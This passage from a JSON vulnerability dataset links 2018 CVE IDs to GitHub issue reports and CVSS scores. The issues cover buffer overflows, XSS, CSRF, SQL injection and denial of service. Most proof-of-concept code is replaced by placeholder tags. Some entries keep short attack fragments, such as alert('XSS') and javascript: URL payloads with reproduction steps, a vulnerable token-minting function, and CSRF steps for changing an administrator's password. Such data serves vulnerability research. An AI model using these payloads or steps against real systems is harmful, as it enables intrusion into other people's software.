  27279. "Issue_Url_new": "https://github.com/jansol/lupng/issues/9",
  27280. "Repo_new": "jansol/lupng",
  27281. "Issue_Created_At": "2018-10-21T07:16:23Z",
  27282. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27284. "severity": "HIGH",
  27285. "baseScore": 8.8,
  27286. "impactScore": 5.9,
  27287. "exploitabilityScore": 2.8
  27288. },
  27289. {
  27290. "CVE_ID": "CVE-2018-18583",
  27291. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/8",
  27292. "Issue_Url_new": "https://github.com/jansol/lupng/issues/8",
  27293. "Repo_new": "jansol/lupng",
  27294. "Issue_Created_At": "2018-10-21T07:15:59Z",
  27295. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27297. "severity": "HIGH",
  27298. "baseScore": 8.8,
  27299. "impactScore": 5.9,
  27300. "exploitabilityScore": 2.8
  27301. },
  27302. {
  27303. "CVE_ID": "CVE-2018-18599",
  27304. "Issue_Url_old": "https://github.com/abeluck/stegdetect/issues/10",
  27305. "Issue_Url_new": "https://github.com/abeluck/stegdetect/issues/10",
  27306. "Repo_new": "abeluck/stegdetect",
  27307. "Issue_Created_At": "2018-10-23T08:03:47Z",
  27308. "description": "Out of bound write. PATHTAG valgrind ./stegdetect tF PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./stegdetect tF PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault APITAG the poc URLTAG",
  27309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27310. "severity": "HIGH",
  27311. "baseScore": 8.8,
  27312. "impactScore": 5.9,
  27313. "exploitabilityScore": 2.8
  27314. },
  27315. {
  27316. "CVE_ID": "CVE-2018-18608",
  27317. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/8",
  27318. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/8",
  27319. "Repo_new": "ky-j/dedecms",
  27320. "Issue_Created_At": "2018-10-23T05:48:28Z",
  27321. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 APITAG NUMBERTAG SP2 allows XSS via the vulnerable function named APITAG defined in the file which is used to display the page numbers list at the bottom of some templates. FILETAG",
  27322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27323. "severity": "MEDIUM",
  27324. "baseScore": 6.1,
  27325. "impactScore": 2.7,
  27326. "exploitabilityScore": 2.8
  27327. },
  27328. {
  27329. "CVE_ID": "CVE-2018-18622",
  27330. "Issue_Url_old": "https://github.com/caokang/waimai/issues/8",
  27331. "Issue_Url_new": "https://github.com/caokang/waimai/issues/8",
  27332. "Repo_new": "caokang/waimai",
  27333. "Issue_Created_At": "2018-10-23T13:31:09Z",
  27334. "description": "there is a xss. POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG Connection: close APITAG APITAG APITAG APITAG APITAG",
  27335. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27336. "severity": "MEDIUM",
  27337. "baseScore": 6.1,
  27338. "impactScore": 2.7,
  27339. "exploitabilityScore": 2.8
  27340. },
  27341. {
  27342. "CVE_ID": "CVE-2018-18623",
  27343. "Issue_Url_old": "https://github.com/grafana/grafana/issues/15293",
  27344. "Issue_Url_new": "https://github.com/grafana/grafana/issues/15293",
  27345. "Repo_new": "grafana/grafana",
  27346. "Issue_Created_At": "2019-02-07T05:48:46Z",
  27347. "description": "XSS: Option to disable or sanitize html source in some panels. Grafana is vulnerable to XSS vulnerability because the panels included in the description below can contain html. Therefore, the option to disable or filter the html source must be provided. > APITAG Component] > APITAG > Dashboard > Text Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Text NUMBERTAG Edit Text Panel NUMBERTAG Set Options > Mode(html) & Content( APITAG alert('XSS'); APITAG ) > > > > APITAG Component] > APITAG > Dashboard > Table Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Table NUMBERTAG Edit Table Panel NUMBERTAG Set Column Styles > : Check Render value as link > : set Url(javascript:alert('XSS')) > > > > APITAG Component] > APITAG > Dashboard > All Panels > General > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Dashboard Settings NUMBERTAG Set dashboard name(TEST APITAG alert('XSS') APITAG NUMBERTAG Save dashboard and go back to dashboard home NUMBERTAG Edit any panel NUMBERTAG Add link, in General NUMBERTAG Write the 'TEST' on the dashboard blank >",
  27348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27349. "severity": "MEDIUM",
  27350. "baseScore": 6.1,
  27351. "impactScore": 2.7,
  27352. "exploitabilityScore": 2.8
  27353. },
  27354. {
  27355. "CVE_ID": "CVE-2018-18628",
  27356. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/458",
  27357. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/458",
  27358. "Repo_new": "pippo-java/pippo",
  27359. "Issue_Created_At": "2018-09-30T06:16:59Z",
  27360. "description": "Java deserialization vulnerabi.",
  27361. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27362. "severity": "CRITICAL",
  27363. "baseScore": 9.8,
  27364. "impactScore": 5.9,
  27365. "exploitabilityScore": 3.9
  27366. },
  27367. {
  27368. "CVE_ID": "CVE-2018-18635",
  27369. "Issue_Url_old": "https://github.com/MailCleaner/MailCleaner/issues/53",
  27370. "Issue_Url_new": "https://github.com/mailcleaner/mailcleaner/issues/53",
  27371. "Repo_new": "mailcleaner/mailcleaner",
  27372. "Issue_Created_At": "2018-10-22T11:06:56Z",
  27373. "description": "Security bug Reflected XSS. Hi, I try ti register on your forum for reporting this bug, but my registration request didn't responded. so: Bug Title: Reflected XSS Product(s): APITAG CE NUMBERTAG APITAG CE NUMBERTAG Tested on: APITAG & APITAG APITAG URI: URLTAG BR, Milad Fadavvi",
  27374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27375. "severity": "MEDIUM",
  27376. "baseScore": 6.1,
  27377. "impactScore": 2.7,
  27378. "exploitabilityScore": 2.8
  27379. },
  27380. {
  27381. "CVE_ID": "CVE-2018-18665",
  27382. "Issue_Url_old": "https://github.com/NexxusUniversity/nexxuscoin/issues/2",
  27383. "Issue_Url_new": "https://github.com/nexxusuniversity/nexxuscoin/issues/2",
  27384. "Repo_new": "nexxusuniversity/nexxuscoin",
  27385. "Issue_Created_At": "2018-10-26T01:42:39Z",
  27386. "description": "a overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG _amount) { if APITAG == owner) { APITAG += _amount; balances[owner] += _amount; Transfer NUMBERTAG owner, _amount); } } you can see the test of this vulnerability, plz verify, thx! (yogurt. EMAILTAG .cn)",
  27387. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27388. "severity": "HIGH",
  27389. "baseScore": 7.5,
  27390. "impactScore": 3.6,
  27391. "exploitabilityScore": 3.9
  27392. },
  27393. {
  27394. "CVE_ID": "CVE-2018-18666",
  27395. "Issue_Url_old": "https://github.com/SwftCoins/SwftCoin/issues/1",
  27396. "Issue_Url_new": "https://github.com/swftcoins/swftcoin/issues/1",
  27397. "Repo_new": "swftcoins/swftcoin",
  27398. "Issue_Created_At": "2018-10-26T02:10:39Z",
  27399. "description": "a overflow vulnerability in APITAG . hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG this, APITAG Transfer(this, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
  27400. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27401. "severity": "HIGH",
  27402. "baseScore": 7.5,
  27403. "impactScore": 3.6,
  27404. "exploitabilityScore": 3.9
  27405. },
  27406. {
  27407. "CVE_ID": "CVE-2018-18667",
  27408. "Issue_Url_old": "https://github.com/klenergy/ethereum-contracts/issues/1",
  27409. "Issue_Url_new": "https://github.com/pylondata/ethereum-contracts/issues/1",
  27410. "Repo_new": "pylondata/ethereum-contracts",
  27411. "Issue_Created_At": "2018-10-26T01:46:11Z",
  27412. "description": "a overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG owner, APITAG Transfer(owner, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
  27413. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27414. "severity": "HIGH",
  27415. "baseScore": 7.5,
  27416. "impactScore": 3.6,
  27417. "exploitabilityScore": 3.9
  27418. },
  27419. {
  27420. "CVE_ID": "CVE-2018-18694",
  27421. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/459",
  27422. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/459",
  27423. "Repo_new": "monstra-cms/monstra",
  27424. "Issue_Created_At": "2018-10-25T05:07:12Z",
  27425. "description": "Monstra NUMBERTAG has Stored XSS via Uploading html file that has no extension.. Brief of this vulnerability In uploading process, Monstra file filter allow to upload no extension file. If html file that has no extension, it can be executed in browser as html, and it causes of Stored XSS. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version APITAG xss.) It can be executed in browser(I tested in Chrome ver NUMBERTAG APITAG Build NUMBERTAG bit)) as html and APITAG It can be executed in browser as html, and it causes of Stored XSS.",
  27426. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27427. "severity": "MEDIUM",
  27428. "baseScore": 4.8,
  27429. "impactScore": 2.7,
  27430. "exploitabilityScore": 1.7
  27431. },
  27432. {
  27433. "CVE_ID": "CVE-2018-18699",
  27434. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/43",
  27435. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/43",
  27436. "Repo_new": "gopro/gpmf-parser",
  27437. "Issue_Created_At": "2018-10-27T06:42:47Z",
  27438. "description": "OOB write. use the demo code and find a OOB write bug in APITAG NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gpmfdemo APITAG NUMBERTAG Warning: set address range perms: large range FILETAG",
  27439. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27440. "severity": "HIGH",
  27441. "baseScore": 8.8,
  27442. "impactScore": 5.9,
  27443. "exploitabilityScore": 2.8
  27444. },
  27445. {
  27446. "CVE_ID": "CVE-2018-18702",
  27447. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/42",
  27448. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/42",
  27449. "Repo_new": "idreamsoft/iCMS",
  27450. "Issue_Created_At": "2018-10-23T15:12:36Z",
  27451. "description": "I found a SQL injection vulnerability. Vulnerabilities are generated in the background FILETAG If you have permission, we can use the injection to achieve file reading, and write the poc as follows ERRORTAG",
  27452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27453. "severity": "CRITICAL",
  27454. "baseScore": 9.8,
  27455. "impactScore": 5.9,
  27456. "exploitabilityScore": 3.9
  27457. },
  27458. {
  27459. "CVE_ID": "CVE-2018-18711",
  27460. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/156",
  27461. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/156",
  27462. "Repo_new": "wuzhicms/wuzhicms",
  27463. "Issue_Created_At": "2018-10-25T14:48:23Z",
  27464. "description": "Two CSRF vulnerabilities that can change the super administrator's username and password. When the super administrator (uid NUMBERTAG logged in, there are NUMBERTAG important POST methods without CSRF protection, can change his username and password respectively. This can be achieved by cheating the super administrator to open the NUMBERTAG pages when he logged in. APITAG APITAG the username to 'hacker') ERRORTAG APITAG APITAG the password to NUMBERTAG ERRORTAG Or we made only NUMBERTAG page POC to make it easy to attack. APITAG ERRORTAG",
  27465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27466. "severity": "HIGH",
  27467. "baseScore": 8.8,
  27468. "impactScore": 5.9,
  27469. "exploitabilityScore": 2.8
  27470. },
  27471. {
  27472. "CVE_ID": "CVE-2018-18717",
  27473. "Issue_Url_old": "https://github.com/Sunvas/Eleanor-CMS/issues/5",
  27474. "Issue_Url_new": "https://github.com/sunvas/eleanor-cms/issues/5",
  27475. "Repo_new": "sunvas/eleanor-cms",
  27476. "Issue_Created_At": "2018-10-24T03:12:33Z",
  27477. "description": "APITAG Site Scripting Vulnerability. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in might allow query pic then you can inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. URLTAG Fix: check the uploaded url.",
  27478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27479. "severity": "MEDIUM",
  27480. "baseScore": 4.8,
  27481. "impactScore": 2.7,
  27482. "exploitabilityScore": 1.7
  27483. },
  27484. {
  27485. "CVE_ID": "CVE-2018-18720",
  27486. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/2",
  27487. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/2",
  27488. "Repo_new": "source-trace/yunucms",
  27489. "Issue_Created_At": "2018-10-25T07:00:34Z",
  27490. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG FILETAG insert POC FILETAG click on the submit button and come back homepage FILETAG",
  27491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27492. "severity": "MEDIUM",
  27493. "baseScore": 4.8,
  27494. "impactScore": 2.7,
  27495. "exploitabilityScore": 1.7
  27496. },
  27497. {
  27498. "CVE_ID": "CVE-2018-18722",
  27499. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/6",
  27500. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/6",
  27501. "Repo_new": "source-trace/yunucms",
  27502. "Issue_Created_At": "2018-10-25T08:18:25Z",
  27503. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG",
  27504. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27505. "severity": "MEDIUM",
  27506. "baseScore": 4.8,
  27507. "impactScore": 2.7,
  27508. "exploitabilityScore": 1.7
  27509. },
  27510. {
  27511. "CVE_ID": "CVE-2018-18723",
  27512. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/3",
  27513. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/3",
  27514. "Repo_new": "source-trace/yunucms",
  27515. "Issue_Created_At": "2018-10-25T07:37:42Z",
  27516. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG APITAG back the homepage FILETAG",
  27517. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27518. "severity": "MEDIUM",
  27519. "baseScore": 4.8,
  27520. "impactScore": 2.7,
  27521. "exploitabilityScore": 1.7
  27522. },
  27523. {
  27524. "CVE_ID": "CVE-2018-18724",
  27525. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/5",
  27526. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/5",
  27527. "Repo_new": "source-trace/yunucms",
  27528. "Issue_Created_At": "2018-10-25T07:57:53Z",
  27529. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG code FILETAG APITAG on the submit button and refresh FILETAG",
  27530. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27531. "severity": "MEDIUM",
  27532. "baseScore": 4.8,
  27533. "impactScore": 2.7,
  27534. "exploitabilityScore": 1.7
  27535. },
  27536. {
  27537. "CVE_ID": "CVE-2018-18725",
  27538. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/4",
  27539. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/4",
  27540. "Repo_new": "source-trace/yunucms",
  27541. "Issue_Created_At": "2018-10-25T07:47:30Z",
  27542. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert POC FILETAG APITAG on the submit button and refresh FILETAG",
  27543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27544. "severity": "MEDIUM",
  27545. "baseScore": 4.8,
  27546. "impactScore": 2.7,
  27547. "exploitabilityScore": 1.7
  27548. },
  27549. {
  27550. "CVE_ID": "CVE-2018-18726",
  27551. "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/8",
  27552. "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/8",
  27553. "Repo_new": "source-trace/yunucms",
  27554. "Issue_Created_At": "2018-10-25T08:30:27Z",
  27555. "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert code FILETAG APITAG on the submie button and refresh FILETAG",
  27556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27557. "severity": "MEDIUM",
  27558. "baseScore": 4.8,
  27559. "impactScore": 2.7,
  27560. "exploitabilityScore": 1.7
  27561. },
  27562. {
  27563. "CVE_ID": "CVE-2018-18749",
  27564. "Issue_Url_old": "https://github.com/clarkgrubb/data-tools/issues/7",
  27565. "Issue_Url_new": "https://github.com/clarkgrubb/data-tools/issues/7",
  27566. "Repo_new": "clarkgrubb/data-tools",
  27567. "Issue_Created_At": "2018-10-26T03:17:54Z",
  27568. "description": "integer overflow. in the function tab to csv of tab to csv.c, when call write_wchars, the args end pass to the write_wchars can be overflow by the operation APITAG ,the will cause a APITAG APITAG poc URLTAG",
  27569. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27570. "severity": "MEDIUM",
  27571. "baseScore": 5.5,
  27572. "impactScore": 3.6,
  27573. "exploitabilityScore": 1.8
  27574. },
  27575. {
  27576. "CVE_ID": "CVE-2018-18771",
  27577. "Issue_Url_old": "https://github.com/yiifans/lulucms/issues/6",
  27578. "Issue_Url_new": "https://github.com/yiifans/lulucms/issues/6",
  27579. "Repo_new": "yiifans/lulucms",
  27580. "Issue_Created_At": "2018-10-24T07:48:59Z",
  27581. "description": "PATHTAG There is an arbitrary file upload vulnerability.. FILETAG FILETAG FILETAG",
  27582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27583. "severity": "HIGH",
  27584. "baseScore": 7.5,
  27585. "impactScore": 3.6,
  27586. "exploitabilityScore": 3.9
  27587. },
  27588. {
  27589. "CVE_ID": "CVE-2018-18781",
  27590. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/9",
  27591. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/9",
  27592. "Repo_new": "ky-j/dedecms",
  27593. "Issue_Created_At": "2018-10-24T07:06:45Z",
  27594. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. APITAG NUMBERTAG SP2 allows XSS via the FILETAG f & keyword parameter. FILETAG Phink APITAG",
  27595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27596. "severity": "MEDIUM",
  27597. "baseScore": 6.1,
  27598. "impactScore": 2.7,
  27599. "exploitabilityScore": 2.8
  27600. },
  27601. {
  27602. "CVE_ID": "CVE-2018-18782",
  27603. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/10",
  27604. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/10",
  27605. "Repo_new": "ky-j/dedecms",
  27606. "Issue_Created_At": "2018-10-24T07:10:43Z",
  27607. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 Reflected XSS exists in APITAG NUMBERTAG SP2 via the FILETAG ftype parameter. FILETAG Phink APITAG",
  27608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27609. "severity": "MEDIUM",
  27610. "baseScore": 6.1,
  27611. "impactScore": 2.7,
  27612. "exploitabilityScore": 2.8
  27613. },
  27614. {
  27615. "CVE_ID": "CVE-2018-18842",
  27616. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/201",
  27617. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/201",
  27618. "Repo_new": "zblogcn/zblogphp",
  27619. "Issue_Created_At": "2018-10-29T10:32:39Z",
  27620. "description": "CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG APITAG URLTAG \u4e00\u4e9b\u6587\u4ef6\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95ee\u4f1a\u5bfc\u81f4csrf_token\u6cc4\u6f0f\u3002 PATHTAG APITAG FILETAG APITAG FILETAG FILETAG",
  27621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27622. "severity": "HIGH",
  27623. "baseScore": 8.8,
  27624. "impactScore": 5.9,
  27625. "exploitabilityScore": 2.8
  27626. },
  27627. {
  27628. "CVE_ID": "CVE-2018-18850",
  27629. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5042",
  27630. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5042",
  27631. "Repo_new": "octopusdeploy/issues",
  27632. "Issue_Created_At": "2018-10-30T22:40:58Z",
  27633. "description": "Remote Code Execution via malicious YAML configurations in some versions. Description An authenticated user with permission to modify deployment processes could upload a maliciously crafted YAML configuration, potentially allowing for remote execution of arbitrary code, running in the same context as the Octopus Server (for self hosted installations by default, SYSTEM). If this issue is of concern to you and your team, we strongly recommend upgrading to version APITAG . CVE ID Pending Affected versions Octopus Server: versions NUMBERTAG APITAG inclusive. Mitigation In any version affected by this issue, we recommend upgrading to version APITAG . Workarounds In situations where upgrade is not possible, running the octopus server built in worker as a service account with limited privileges may help to minimize the potential impact of such an occurrence, however this will not prevent attackers from attempting to chain other attacks against the server. URLTAG URLTAG",
  27634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  27635. "severity": "HIGH",
  27636. "baseScore": 8.8,
  27637. "impactScore": 5.9,
  27638. "exploitabilityScore": 2.8
  27639. },
  27640. {
  27641. "CVE_ID": "CVE-2018-18853",
  27642. "Issue_Url_old": "https://github.com/spray/spray-json/issues/278",
  27643. "Issue_Url_new": "https://github.com/spray/spray-json/issues/278",
  27644. "Repo_new": "spray/spray-json",
  27645. "Issue_Created_At": "2018-10-15T16:06:17Z",
  27646. "description": "Denial of service when parsing a JSON object with an unexpected field that has a big number. APITAG quadratic_ decreasing of throughput when length of the JSON object is increasing On contemporary CPUs parsing of such JSON object with an additional field that has of NUMBERTAG decimal digits NUMBERTAG Mb) can took more than NUMBERTAG seconds: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
  27647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27648. "severity": "HIGH",
  27649. "baseScore": 7.5,
  27650. "impactScore": 3.6,
  27651. "exploitabilityScore": 3.9
  27652. },
  27653. {
  27654. "CVE_ID": "CVE-2018-18854",
  27655. "Issue_Url_old": "https://github.com/spray/spray-json/issues/277",
  27656. "Issue_Url_new": "https://github.com/spray/spray-json/issues/277",
  27657. "Repo_new": "spray/spray-json",
  27658. "Issue_Created_At": "2018-10-15T15:46:03Z",
  27659. "description": "Denial of service when parsing JSON object with keys that have the same hash code. APITAG quadratic_ decreasing of throughput when number of JSON object fields (with keys that have the same hash code) is increasing On contemporary CPUs parsing of such JSON object (with a sequence of NUMBERTAG fields like below that is NUMBERTAG Mb) can took more than NUMBERTAG seconds: APITAG Below are results of the benchmark where size is a number of such fields: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
  27660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27661. "severity": "HIGH",
  27662. "baseScore": 7.5,
  27663. "impactScore": 3.6,
  27664. "exploitabilityScore": 3.9
  27665. },
  27666. {
  27667. "CVE_ID": "CVE-2018-18867",
